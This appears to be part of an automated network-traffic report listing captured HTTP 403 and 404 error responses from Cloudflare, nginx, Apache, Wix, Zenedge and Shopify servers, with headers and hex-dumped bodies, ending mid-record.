                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2FfIcPY92J7Ih5E94xA50MP4kxOA%2FSDB75T%2FYKFqFIZSeXDOW6Pq18xgBlEhy9EwnZnhPlrETWWkJv8RZIHnscnn7EI5HXXq%2FNoyzHX%2FK5RlHW5FA%2BQyCEEHHSTT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9c318f83648-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:57 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:08 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMeXcSPCUv1WDAmE2RboxBjt,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1679460188.9451543406116436X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:08 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rwU4r1UzE5MEjTy3uhQeymMf3hquSN34toSlH8eOFpexBTJWhLW4bTzc7IWMahv0%2BpZvnF3iOJM7x%2FjEj7NAS9TNMZ4oSxMbVv0BAL7ovyafrzWblhRYjpmxTV7aaI6O"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc5a4eae16958-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eg%2Bp6UJ%2BIJ%2FAPMj%2BP4DfVcISydEKhC%2BsepuMS7PyMYjkQJXhlxzux%2BxXNiS4q1d1Dv9fpUIDCLha0HjURIACTqief%2FeYin4uEiLaCKfQr%2FW%2BCBdUGL3RPAdXjFYvatDa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc5a56b466958-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:43:09 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:09 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:10 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:10 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:12 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:12 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 22 Mar 2023 04:43:14 GMTX-Cache-Status: X-Zen-Fury: d2cc4646f955048316a5f905b09d70a12f720b36Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 30 34 37 22 2c 20 31 36 37 39 34 36 30 31 39 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2047", 1679460194, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Fy3m%2FXJdB2oKAEAr8uo31EwSgTJ%2FPgf2Edtf4KebtBCM4PlGKVjrCqMWs0%2Bh3YpKWmhz0w1O6INx5%2FRNg78t8N3D1W1W9dM1OQ4QdJ6%2BY%2BJFpS5rfKLiuRlFDHjZjMKk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc5ca1eb5bb3b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TzHiiD5wPXCQBsIGx0HkQDInprv%2Bfkeotn%2FDK3i41O7MITuDWDqtKWJwhSDSMdimswKKP8I4ZX51NRnk6M2H1qNQmEyHlppT08ZBh%2BMJUcyHNlKP3h3BKre2BqyzEodT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc5ca8efebb3b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:43:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 79dfc10b-4cf1-48c0-b621-34778eb1b12eCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B5yr7ofJlc54Gsm2fFTusVJVIz4CoHFB6PH6f8a%2FpqMLstec78bLJwGCHafwCMfGGgO4kcIOI2SKsgykPw2P0XNBdtH9juaDgFquEoCqY7ajBfuABH2HaYKQUIcwxVo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=133.999825Server: cloudflareCF-RAY: 7abbc5ca1e7e2c22-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:20 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfWq5cd5HQrhfZROeg1bBla,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1679460200.66617428537316414X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 